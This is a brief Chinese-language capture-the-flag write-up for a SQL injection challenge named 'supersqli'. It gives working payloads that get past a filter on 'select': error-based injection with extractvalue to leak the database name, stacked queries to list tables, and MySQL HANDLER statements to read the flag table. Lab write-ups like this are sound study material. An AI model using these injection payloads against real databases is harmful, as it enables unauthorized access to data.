输入select发现被过滤了.
这里直接告诉我们哪些关键词被过滤了.
发现;没被过滤,同时虽然update被过滤了,但是仍然可以用extractvalue报错注入得到数据库的名字.
1’ and extractvalue(1,concat(’~’,database()))#
得到:
得到数据库名后就可以show tables了.
1’;use supersqli;show tables;#
得到表名之后.
使用HANDLER … OPEN语句
1’;
handler FlagHere open;
handler FlagHere read first;
handler flaghere close;
得到flag